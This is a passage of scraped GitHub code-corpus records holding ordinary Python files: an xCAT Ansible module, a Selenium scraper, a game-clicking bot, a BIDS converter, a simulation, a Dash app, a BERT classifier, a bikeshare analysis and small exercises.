self._parse_command_args(self.params['args']),\n self._parse_command_options(self.params['options']),\n ]\n cmd = ' '.join(cmd)\n startd = datetime.datetime.now()\n env = self.params['environment']\n xcat_env_path = env.get('xcat_env_path')\n cmd = \"bash -c \\'source %(env)s && %(cmd)s \\'\" % {'env': xcat_env_path,\n 'cmd': cmd}\n try:\n (rc, out, err) = _execute_command(cmd, shell=True)\n except Exception:\n result['err'] = traceback.format_exc()\n self.rc = -1\n return dict(failed=True, changed=self.changed, rc=self.rc, cmd=cmd,\n msg=\"Command error: {}\".format(result))\n\n endd = datetime.datetime.now()\n delta = endd - startd\n result['out'] = out\n self.rc = int(rc)\n # command success\n if self.rc is not 0:\n result['err'] = err\n return dict(failed=True, changed=self.changed, rc=self.rc,\n startd=str(startd), endd=str(endd),\n delta=str(delta),\n msg=\"Command error: {}\".format(result),\n cmd=cmd, out=out, err=err)\n else:\n return dict(changed=self.changed, rc=self.rc, startd=str(startd),\n endd=str(endd), delta=str(delta),\n msg=\"Command success: {}\".format(result),\n cmd=cmd, out=out, err=err)\n\n def exec_xcat_cmd(self):\n if self.params['command'] in READONLY_CMDS:\n self.changed = False\n result = self._exec_xcat_cmd()\n if self.rc != 0:\n self.module.fail_json(**result)\n return\n if self.params['format_obj']:\n self._format_object_result(result)\n self.module.exit_json(**result)\n\n def _format_object_result(self, result):\n \"\"\"Process object output from xcat command\n\n Object name: kvmhost\n groups=all\n ip=10.5.101.1\n postbootscripts=otherpkgs\n postscripts=syslog,remoteshell,syncfiles\n Object name: testnode1\n arch=x86_64\n currchain=boot\n currstate=boot\n groups=all\n initrd=xcat/osimage/ubuntu16.04.1-x86_64-install-compute/initrd.img\n \"\"\"\n out = result['out']\n lines = out.split('\\n')\n obj = None\n xcat_objs = []\n xcat_attrs = dict()\n for line in lines:\n line = line.strip()\n if line.startswith('Object name:'):\n if obj 
is not None:\n xcat_objs.append(xcat_attrs)\n temp = line.split(':')\n if len(temp) > 1:\n obj = line.split(':')[1].strip()\n xcat_attrs['name'] = obj\n continue\n elif obj is not None:\n temp = line.split('=')\n if len(temp) > 1:\n key = line.split('=')[0].strip()\n val = line.split('=')[1].strip()\n xcat_attrs[key] = val\n if obj is not None:\n xcat_objs.append(xcat_attrs)\n result['xcat_objs'] = xcat_objs\n\n\ndef generate_module():\n argument_spec = dict(\n command=dict(requried=True, type='str'),\n options=dict(required=False, type='dict'),\n args=dict(required=False, type='list'),\n format_obj=dict(required=False, type='str'),\n stdin=dict(required=False, type='str'),\n stdout=dict(required=False, type='str'),\n environment=dict(required=False, type='dict'),\n )\n module = AnsibleModule(\n argument_spec=argument_spec,\n bypass_checks=True\n )\n env = module.params.pop('environment', dict())\n new_args = module.params.pop('common_options', dict())\n new_args['environment'] = {'xcat_env_path': '/etc/profile.d/xcat.sh'}\n if env:\n new_args['environment'].update(env)\n\n for key, value in module.params.items():\n if key in new_args and value is None:\n continue\n new_args[key] = value\n\n module.params = new_args\n return module\n\n\ndef main():\n module = generate_module()\n\n try:\n XCATWorker(module).exec_xcat_cmd()\n # if ret is not None:\n # xcat_worker.print_json_data(ret)\n except Exception:\n module.exit_json(failed=True, changed=True,\n msg=repr(traceback.format_exc()))\n\n\n# import module snippets\nfrom ansible.module_utils.basic import * # noqa\n\nif __name__ == '__main__':\n main()\n","repo_name":"chenglch/xcat-play","sub_path":"ansible/xcat2/library/xcat_cmd.py","file_name":"xcat_cmd.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"5307975692","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 3 21:48:08 2017\n\n@author: 
byung\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nurl = 'https://play.google.com/store/apps/details?id=com.venticake.retrica&hl=ko#details-reviews'\n\ndriver = webdriver.Chrome(executable_path=r'D:\\DataScience\\chromedriver.exe')\ndriver.get(url)\n\n\n\n\nelem = driver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\n\ntmp = driver.page_source\n\nassert \"No results found.\" not in driver.page_source\ndriver.close()","repo_name":"byungjun0689/DataScience","sub_path":"3. Python/04. 개인/Crawling/Selenium.py","file_name":"Selenium.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"769751915","text":"from PIL import ImageGrab as IG\nfrom PIL import ImageOps as IO\nimport win32api, win32con\nimport time\n\n'''\n\nAll coordinates assume a screen resolution of 1920x1080, and Opera \nno Bookmarks Toolbar enabled, running in a Win8 PC.\nURL = http://goo.gl/6v7nM6\nx_pad = 462\ny_pad = 68\nPlay area = x_pad+1, y_pad+1, 901, 727\n(145, 88, 62)\n\n'''\n\nclass IterationLimit(Exception):\n def __init__(self, message, errors):\n\n # Call the base class constructor with the parameters it needs\n super(IterationLimit, self).__init__(message)\n\n # Now for your custom code...\n self.errors = errors\n\nclass ColorNotFound(Exception):\n def __init__(self, message, errors):\n\n # Call the base class constructor with the parameters it needs\n super(ColorNotFound, self).__init__(message)\n\n # Now for your custom code...\n self.message = message\n self.errors = errors\n\nclass Coord:\n\tleft = (75, 395)\n\tright = (360, 395)\n\tplay = (219, 476)\n\t\n\tlTree = (103, 217)\n\trTree = (333, 217)\n\n\tlMan = (145, 498)\n\trMan = (295, 498)\n\n\tscore = (227, 117)\n\tGameOver = (287, 227)\n\nclass Color:\n\tTree = (163, 150, 63)\n\tNoTree = (156, 98, 70)\n\tAd = (187, 187, 187)\n\tGameOver = 
(236, 183, 91)\n\ndef leftTree(im):\n\tcolor = im.getpixel(Coord.lTree)\n\tif color == Color.Tree:\n\t\tprint('Careful')\n\t\tclick(Coord.left)\n\t\tchangeSide('right')\n\telif color == Color.NoTree:\n\t\tclick(Coord.left)\n\t\tleftTimber()\n\telse:\n\t\traise ColorNotFound('leftTree', color)\n\ndef rightTree(im):\n\tcolor = im.getpixel(Coord.rTree)\n\tif color == Color.Tree:\n\t\tprint('Careful')\n\t\tclick(Coord.right)\n\t\tchangeSide('left')\n\telif color == Color.NoTree:\n\t\tclick(Coord.right)\n\t\trightTimber()\n\telse:\n\t\tprint('Score = ' + str(n-1))\n\t\traise ColorNotFound('rightTree', color)\n\ndef leftTimber():\n\tif n%150 == 0:\n\t\traise IterationLimit('Left' , 'left')\n\tim = screenGrab()\n\tleftTree(im)\n\ndef rightTimber():\n\tif n%150 == 0:\n\t\traise IterationLimit('Right' , 'right')\n\tim = screenGrab()\n\trightTree(im)\n\ndef changeSide(string):\n\tif string == 'right':\n\t\tclick(Coord.right)\n\t\tclick(Coord.right)\n\t\trightTimber()\n\telif string == 'left':\n\t\tclick(Coord.left)\n\t\tclick(Coord.left)\n\t\tleftTimber()\n\telse:\n\t\tprint('WTF!?')\n\ndef screenGrab():\n\tim = IG.grab(box)\n\treturn im\n\ndef leftClick():\n\tglobal c\n\tc += 1\n\ttime.sleep(.005)\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n\ttime.sleep(.005)\n\twin32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n\tprint('Clic!')\n\ttime.sleep(.03) #recommended 0.008\n\ndef mousePos(coord):\n\twin32api.SetCursorPos((x_pad + coord[0], y_pad + coord[1]))\n\ndef getCoords():\n\tx,y = win32api.GetCursorPos()\n\tx = x - x_pad\n\ty = y - y_pad\n\tprint(x,y)\n\ndef click(xy):\n\tglobal n\n\tn += 1\n\tmousePos(xy)\n\tif xy == Coord.left:\n\t\tprint('left', end=' ')\n\telif xy == Coord.right:\n\t\tprint('right', end=' ')\n\telse:\n\t\tprint('play', end=' ')\n\tleftClick()\n\ndef startGame(string):\n\tglobal n\n\n\tif not n > 1:\n\t\tclick(Coord.play)\n\t\ttime.sleep(.1)\n\n\ttry:\n\t\tif string == 'left':\n\t\t\tleftTimber()\n\t\telif string == 
'right':\n\t\t\trightTimber()\n\n\texcept IterationLimit as e:\n\t\tn += 1\n\t\tstartGame(e.errors)\n\n\texcept ColorNotFound as ce:\n\t\tprint('-'*80)\n\t\tprint('In ' + str(ce.message) + ', the bot found the rgb color: ' + str(ce.errors))\n\t\tprint('Aprox. Score = ', int(c/2))\n\ndef main():\n\tstartGame('left')\n\n# GLOBALS\nx_pad = 462\ny_pad = 68\nbox = (x_pad + 1, y_pad + 1, x_pad + 439, y_pad + 659)\nn = 0\nc = 0\nsg = 0\n\nif __name__ == '__main__':\n\tmain()","repo_name":"redcpp/timberPlayer2.0","sub_path":"timberPlayer_2.0.py","file_name":"timberPlayer_2.0.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"26952342369","text":"\"\"\"Convert the NIFD dataset into BIDS.\"\"\"\n\nfrom os import PathLike\nfrom typing import List\n\n\ndef convert_images(\n path_to_dataset: PathLike,\n bids_dir: PathLike,\n path_to_clinical: PathLike,\n) -> List[PathLike]:\n \"\"\"Convert the entire dataset in BIDS.\n\n Scans available files in the path_to_dataset,\n identifies the patients that have images described by the JSON file,\n converts the image with the highest quality for each category.\n \"\"\"\n\n import clinica.iotools.bids_utils as bids\n\n from .nifd_utils import (\n dataset_to_bids,\n read_clinical_data,\n read_imaging_data,\n write_bids,\n )\n\n clinical_data = read_clinical_data(path_to_clinical)\n imaging_data = read_imaging_data(path_to_dataset)\n\n participants, sessions, scans = dataset_to_bids(\n imaging_data=imaging_data, clinical_data=clinical_data\n )\n\n written = write_bids(\n to=bids_dir,\n participants=participants,\n sessions=sessions,\n scans=scans,\n )\n readme_data = {\n \"link\": \"https://ida.loni.usc.edu/home/projectPage.jsp?project=NIFD&page=HOME&subPage=OVERVIEW_PR#\",\n \"desc\": (\n \"NIFD is the nickname for the frontotemporal lobar degeneration neuroimaging initiative \"\n \"(FTLDNI, AG032306), which was funded by the NIA and 
NINDS to characterize longitudinal clinical and \"\n \"imaging changes in FTLD.The imaging and clinical methods are the same for NIFD and for the 4-Repeat \"\n \"Tauopathy Neuroimaging Initiative (4RTNI), which is also available for download from LONI. Controls for \"\n \"NIFD are the same controls as those collected for 4RTNI.\"\n ),\n }\n bids.write_modality_agnostic_files(\n study_name=\"NIFD\", readme_data=readme_data, bids_dir=bids_dir\n )\n return written\n","repo_name":"aramis-lab/clinica","sub_path":"clinica/iotools/converters/nifd_to_bids/nifd_to_bids.py","file_name":"nifd_to_bids.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"18"} +{"seq_id":"34464920491","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def bstToGst(self, root: TreeNode) -> TreeNode:\n def in_order(node):\n if node != None:\n in_order(node.right)\n # print(node.val)\n total = nodes.pop(0)\n total += node.val\n nodes.append(total)\n node.val = total\n in_order(node.left)\n \n nodes = [0]\n in_order(root)\n return root\n \n","repo_name":"mainuddin-rony/leetcode","sub_path":"problem_1038.py","file_name":"problem_1038.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13563862663","text":"from __future__ import print_function\nimport os\nimport datetime\nimport time\nfrom com.sirui.sim.resources import *\nfrom com.sirui.sim.atom import *\n\ndef adsorption():\n logger = logging.getLogger()\n while True:\n try:\n yield Context.getEnv().timeout(1)\n except simpy.Interrupt as i:\n print('adsorption process interrupted. 
')\n return\n\n if Atom.num >= Config.SCOPE_SIZE * Config.SCOPE_SIZE * Config.SCOPE_HEIGHT:\n logger.debug('reaches 100% ')\n stop_process = Context.getEnv().process(stopSimulation())\n Context.addProcess('Stop', stop_process)\n\n adsorption_rate = Config.ADSORPTION_RATE\n while adsorption_rate >= 1:\n Atom.createOne()\n adsorption_rate -= 1\n if random.random() < adsorption_rate:\n Atom.createOne()\n\ndef clock():\n logger = logging.getLogger()\n start = time.clock()\n while True:\n logger.debug(\"clock: %d\" % Context.getEnv().now)\n end = time.clock()\n print(\"clock: %d / %s. %d%%\" % (Context.getEnv().now, Config.SIM_TIME, round((end - start)*100/60/Config.time_limit)))\n if (end - start) > 60*Config.time_limit:\n # early termination\n print('simulation terminated due to long running time!')\n stop_process = Context.getEnv().process(stopSimulation())\n Context.addProcess('Stop', stop_process)\n\n try:\n yield Context.getEnv().timeout(1)\n except simpy.Interrupt as i:\n print('clock process interrupted. ')\n return\n\n\n\n\ndef printInfo():\n logger = logging.getLogger()\n now = datetime.datetime.now()\n logger.info(now.strftime(\"%Y-%m-%d %H:%M\"))\n logger.info('Delta_Mu: %s Phi: %s' % (Config.delta_mu, Config.phi))\n logger.info('Deposition rate per site: %s ' % Config.ADSORPTION_RATE_PER_SITE)\n logger.info(\"Simulation starts. #InitAtom: %d, Field: %d*%d*%d, Time: %s\" % (Config.NUM_ATOM, Config.SCOPE_SIZE, Config.SCOPE_SIZE, Config.SCOPE_HEIGHT, Config.SIM_TIME))\n\n print('Delta_Mu: %s Phi: %s' % (Config.delta_mu, Config.phi))\n print('Deposition rate per site: %s ' % Config.ADSORPTION_RATE_PER_SITE)\n print(\"Simulation starts. 
#InitAtom: %d, Field: %d*%d*%d, Time: %s\" % (Config.NUM_ATOM, Config.SCOPE_SIZE, Config.SCOPE_SIZE, Config.SCOPE_HEIGHT, Config.SIM_TIME))\n\ndef cleanUp():\n logger = logging.getLogger()\n logger.handlers = []\n\ndef stopSimulation():\n # interrupt all other process\n while True:\n deposition_process = Context.getProcess('Adsorption')\n if deposition_process is not None:\n deposition_process.interrupt(('Stop', 0))\n yield deposition_process\n\n atoms = Context.getAtoms()\n for atom in atoms:\n atom.process.interrupt(('Stop', 0))\n\n clock_process = Context.getProcess('Clock')\n if clock_process is not None:\n clock_process.interrupt(('Stop', 0))\n yield clock_process\n\n return\n\ndef resetAtoms():\n Atom.id = 0\n Atom.num = 0\n\ndef configLogger(log_level, log_info_path):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # console handler\n ch = logging.StreamHandler()\n ch.setLevel(log_level)\n logger.addHandler(ch)\n\n # create a file handler\n fh = logging.FileHandler(log_info_path)\n fh.setLevel(logging.INFO)\n logger.addHandler(fh)\n\ndef main(delta_mu, phi, log_level):\n log_info_path = 'logs/sim_mu%s_phi%s' % (delta_mu, phi)\n if os.path.exists(log_info_path):\n os.remove(log_info_path)\n\n configLogger(log_level, log_info_path)\n\n Config.setParameters(delta_mu, phi)\n\n printInfo()\n\n if Config.SCOPE_SIZE * Config.SCOPE_SIZE * 2 < Config.NUM_ATOM:\n raise ValueError(\"Number of initial atom is too much\")\n # Setup and start the simulation\n random.seed(Config.RANDOM_SEED) # This helps reproducing the results\n # Create an environment and start the setup process\n env = simpy.Environment()\n field = Field(env, Config.SCOPE_SIZE)\n context = Context.create(field=field, env=env)\n resetAtoms()\n\n clock_process = env.process(clock())\n deposition_process = env.process(adsorption())\n\n context.addProcess('Clock', clock_process)\n context.addProcess('Adsorption', deposition_process)\n Atom.createInit(Config.NUM_ATOM)\n\n # Execute!\n 
env.run(until=Config.SIM_TIME)\n\n cleanUp()\n\nif __name__ == '__main__':\n\n\n main(1.0, 0.1, logging.DEBUG)","repo_name":"siruix/CrystalGrowthSimulation","sub_path":"com/sirui/sim/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33655373059","text":"\"\"\"\nhttp://pythontutor.ru/lessons/2d_arrays/problems/2d_max/\n\nНайдите индексы первого вхождения максимального элемента. Выведите два числа: номер строки и номер столбца,\nв которых стоит наибольший элемент в двумерном массиве. Если таких элементов несколько, то выводится тот,\nу которого меньше номер строки, а если номера строк равны то тот, у которого меньше номер столбца.\n\nПрограмма получает на вход размеры массива n и m, затем n строк по m чисел в каждой.\n\"\"\"\n\nn, m = [int(i) for i in input().split()]\n\nlst = []\nfor i in range(n):\n lst.append([int(j) for j in input().split()])\n\n_i = 0\n_j = 0\n_max = lst[_i][_j]\nfor i in range(n):\n if max(lst[i]) > _max:\n _max = max(lst[i])\n _i = i\n _j = lst[i].index(_max)\n\nprint(_i, _j)\n","repo_name":"ornichola/learning-new","sub_path":"pythontutor-ru/09_2d_arrays/01_2d_max.py","file_name":"01_2d_max.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"36489702325","text":"from typing import Iterable, Mapping\nimport pandas as pd\n\nimport dash\nfrom dash import dcc, html, dash_table\nimport dash_bootstrap_components as dbc\nimport dash_daq as daq\n\nfrom app import app, df\nfrom styles import SIDEBAR_STYLE, CONTENT_STYLE, COMPANY_PAGE\n\nfrom components.dropdowns import ticker_dropdown, commodities_dropdown, industry_dropdown, fred_dropdown\nfrom components.charts import commodity_chart, price_chart, fred_chart, industry_chart\n\n''' PAGES '''\nhomepage = dbc.Container([\n html.H1('Home 
Page'),\n])\n\ncommodity_page = dbc.Container([\n commodities_dropdown,\n commodity_chart\n])\n\ncompany_page = dbc.Container([\n ticker_dropdown,\n price_chart\n], style=COMPANY_PAGE)\n\nfred_page = dbc.Container([\n fred_dropdown,\n daq.BooleanSwitch(id='log-switch', on=False, label='log-Y', labelPosition='top', color='#9B51E0'),\n fred_chart\n])\n\nindustry_page = dbc.Container([\n industry_dropdown,\n industry_chart\n])\n\n##############\n# Main Layout\n##############\n\nsidebar = html.Div(\n [\n html.H2(\"Fiancial Analysis\", className=\"display-6\"),\n html.Hr(),\n html.P(\n \"Select a page below\", className=\"lead\"\n ),\n dbc.Nav(\n [\n dbc.NavLink(\"Home\", href=\"/\", active=\"exact\"),\n dbc.NavLink(\"Company Overview\", href=\"/company_overview\", active=\"exact\"),\n dbc.NavLink(\"Industry Analysis\", href=\"/industries\", active=\"exact\"),\n dbc.NavLink(\"FRED\", href=\"/fred\", active=\"exact\"),\n dbc.NavLink(\"Commodities\", href=\"/commodities\", active=\"exact\"),\n ],\n vertical=True,\n pills=True,\n ),\n ],\n style=SIDEBAR_STYLE,\n)\n\ncontent = html.Div(id=\"page-content\", style=CONTENT_STYLE)\n\ndef main_layout() -> html.Div:\n return html.Div(\n children=[\n dcc.Location(id='url'),\n sidebar,\n content\n ]\n )\n\n","repo_name":"travisv/dash_apps","sub_path":"finance_app/layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72558001000","text":"#! 
-*- coding: utf-8 -*-\n\nimport torch\n\nfrom utils.utils import tokenizer\nfrom inputters import InputFeatures\nfrom classification.models import BertForMultiLabelSequenceClassification\n\nLABELS = ['alarm', 'bag', 'chat', 'command', 'face', 'greet', 'intelligent_home', 'machine', 'food',\n 'music', 'news', 'query', 'radio', 'sleep', 'story', 'time', 'volume', 'weather', 'study']\nBERT_MODEL = '/data/gump/bert_chinese/chinese_L-12_H-768_A-12'\nNUM_LABELS = 19\nSTATE_DICT = '/data/gump/bert_chinese/chinese_L-12_H-768_A-12/cache/finetuned_pytorch_model14.bin'\n\nstate_dict = torch.load(STATE_DICT, map_location=lambda storage, loc: storage)\n\n\nclass Predict(object):\n def __init__(self):\n self.model = BertForMultiLabelSequenceClassification.from_pretrained(BERT_MODEL, num_labels=NUM_LABELS,\n state_dict=state_dict)\n # if torch.cuda.is_available():\n # self.model.cuda()\n self.max_length = 18\n self.label_map = {i: label for i, label in enumerate(LABELS)}\n self.tokenizer = tokenizer()\n\n def get_features(self, sentence):\n features = []\n tokens = self.tokenizer.tokenize(sentence)\n tokens = [\"[CLS]\"] + tokens + [\"[SEP]\"]\n\n segment_ids = [0] * len(tokens)\n\n input_ids = self.tokenizer.convert_tokens_to_ids(tokens)\n input_mask = [1] * len(input_ids)\n\n padding = [0] * (self.max_length - len(input_ids))\n input_ids += padding\n input_mask += padding\n segment_ids += padding\n\n features.append(InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=None))\n return features\n\n def predict(self, sentence):\n features = self.get_features(sentence)\n input_ids = torch.tensor([item.input_ids for item in features], dtype=torch.long) # .cuda()\n input_mask = torch.tensor([item.input_mask for item in features], dtype=torch.long) # .cuda()\n segment_ids = torch.tensor([item.segment_ids for item in features], dtype=torch.long) # .cuda()\n\n with torch.no_grad():\n logits = self.model(input_ids, input_mask, 
segment_ids).view(-1,).sigmoid()\n\n score = {self.label_map[i]: item for i, item in enumerate(logits.tolist())}\n\n score = sorted(score.items(), key=lambda x: x[1], reverse=True)\n return score[:3]\n\n\nif __name__ == '__main__':\n sentences = '你去学习吧'\n result = Predict().predict(sentences)\n print(result)\n","repo_name":"gump1368/bert-awesome","sub_path":"classification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21177028130","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington).\n \n cities =['chicago', 'new york city', 'washington']\n city = ''\n while city not in cities:\n city = input(\"Which city do you want to have a closer look at? Choose one of Chicago, New York City or Washington: \").lower()\n if city not in cities: \n print('Try again!')\n else:\n break\n print(\"\\nYou chose, {}!\".format(city))\n \n # get user input for month\n months =['all','january','february','march','april','may','june','july','august','september','october','november','december']\n month = ''\n while month not in months:\n month = input(\"Which month do you want to have a closer look at? 
Choose one of All, January, February, March, April, May, June, July, August, September, October, November, December: \").lower()\n if month not in months: \n print('try again!')\n else:\n break\n print(\"\\nYou chose, {}!\".format(month))\n\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n days =['all','monday','tuesday','wednesday','thursday','friday','saturday','sunday']\n day = ''\n while day not in days:\n day = input(\"Which day do you want to have a closer look at? Choose one: All, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday: \").lower()\n if day not in days: \n print('Try again!')\n else:\n break\n print(\"\\nYou chose, {}!\".format(day))\n \n print(\"\\nYour filters are: {},{},{}!\".format(city, month, day)) \n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n df['hour'] = df['Start Time'].dt.hour\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months =['january','february','march','april','may','june','july','august','september','october','november','december']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == 
month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n return df\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n \n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n # display the most common month\n months =['january','february','march','april','may','june','july','august','september','october','november','december']\n most_common_month = months[df['month'].mode()[0]-1].title()\n print(\"Most common month is: {}\".format(most_common_month))\n\n # display the most common day of week\n most_common_day = df['day_of_week'].mode()[0]\n print(\"Most common day is: {}\".format(most_common_day))\n\n # display the most common start hour\n most_common_hour = df['hour'].mode()[0]\n print(\"Most common start hour is: {}\".format(most_common_hour)) \n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n \n \n # display most commonly used start station\n most_common_start_station = df['Start Station'].mode()[0]\n print(\"Most common start station is: {}\".format(most_common_start_station))\n\n # display most commonly used end station\n most_common_end_station = df['End Station'].mode()[0]\n print(\"Most common end station is: {}\".format(most_common_end_station))\n\n # display most frequent combination of start station and end station trip\n most_frequent_combination = df.groupby(['Start Station','End Station']).size().idxmax()\n print(\"Most frequent combination: Start Station: {} and End Station: {}\".format(most_frequent_combination[0],most_frequent_combination[1])) \n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n 
print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n \n # display total travel time\n total_travel_time = df['Trip Duration'].sum()\n total_travel_time_days = int(total_travel_time//(24*60*60))\n total_travel_time_hours = int((total_travel_time%(24*60*60))//(60*60))\n total_travel_time_min = int(((total_travel_time%(24*60*60))%(60*60))//60)\n total_travel_time_sec = int(((total_travel_time%(24*60*60))%(60*60))%60)\n print(\"Total Travel Time is: {} days {} hours {} mins {} sec\".format(total_travel_time_days,total_travel_time_hours,total_travel_time_min,total_travel_time_sec))\n\n # display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n mean_travel_time_days = int(mean_travel_time//(24*60*60))\n mean_travel_time_hours = int((mean_travel_time%(24*60*60))//(60*60))\n mean_travel_time_min = int(((mean_travel_time%(24*60*60))%(60*60))//60)\n mean_travel_time_sec = int(((mean_travel_time%(24*60*60))%(60*60))%60)\n print(\"Mean Travel Time is: {} days {} hours {} mins {} sec\".format(mean_travel_time_days,mean_travel_time_hours,mean_travel_time_min,mean_travel_time_sec))\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print('User Types:\\n' + user_types.to_string())\n \n # Display counts of gender\n try:\n gender = df['Gender'].value_counts()\n print('\\nGender:\\n' + gender.to_string())\n # Display earliest, most recent, and most common year of birth\n earliest_year_of_birth = int(df['Birth Year'].min())\n print('\\nEarliest Date of Birth: {}'.format(earliest_year_of_birth))\n most_recent_year_of_birth = int(df['Birth Year'].max())\n 
print('Most recent Date of Birth: {}'.format(most_recent_year_of_birth))\n most_common_year_of_birth = int(df['Birth Year'].mode()[0])\n print('Most common Date of Birth: {}'.format(most_common_year_of_birth))\n except KeyError:\n print('\\nSorry. Information about Gender and Birth Year is not available for the city of Washington.')\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef raw_data(df):\n \"\"\"\n Asks user if raw data should be displayed. User is asked again if evene more line should be displayed.\n\n Returns:\n Five rows of raw data\n \"\"\"\n x = input('\\nDo you want to see a preview of the Raw Data? Yes or No?\\n ').lower()\n a = 0\n b = 5\n while True:\n if x == 'yes':\n print(df.iloc[a:b])\n a += 5\n b += 5\n elif x == 'no':\n break\n else:\n print('Wrong Input. Try again!')\n x = input('\\nDo you want to see more lines of the data? Yes or No?\\n ').lower()\n \n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n try: \n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n raw_data(df)\n except KeyError:\n print(\"Sorry there is no data for the filters you selected.\\nSelect one of these month: All, January, February, March, April, May, June \")\n except IndexError:\n print(\"Sorry there is no data for the filters you selected.\\nSelect one of these month: All, January, February, March, April, May, June\")\n except ValueError:\n print(\"Sorry there is no data for the filters you selected.\")\n \n \n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"sgabriel92/Bikeshare_project_pyhton","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"16063198161","text":"from dai3syou import No20\nimport re\n\n\ndef remove_markup(str):\n # 強調\n str = re.sub(r\"'{2,5}\", r\"\", str)\n # 内部リンク\n str = re.sub(r\"\\[{2}([^|\\]]+?\\|)*(.+?)\\]{2}\", r\"\\2\", str)\n # 言語を指定した表記\n str = re.sub(r\"\\{{2}.+?\\|.+?\\|(.+?)\\}{2}\", r\"\\1 \", str)\n # コメント\n str = re.sub(r\"<.*?>\", r\"\", str)\n # 外部リンク\n str = re.sub(r\"\\[.*?\\]\", r\"\", str)\n return str\n\n\ntemp_dict = {}\nlines = No20.extract_from_json(u\"イギリス\").split(\"\\n\")\n\nfor line in lines:\n category_line = re.search(\"^\\|(.*?)\\s=\\s(.*)\", line)\n if category_line is not None:\n temp_dict[category_line.group(1)] = remove_markup(category_line.group(2))\n\nfor k, v in sorted(temp_dict.items(), key=lambda x: x[0]):\n print(k, 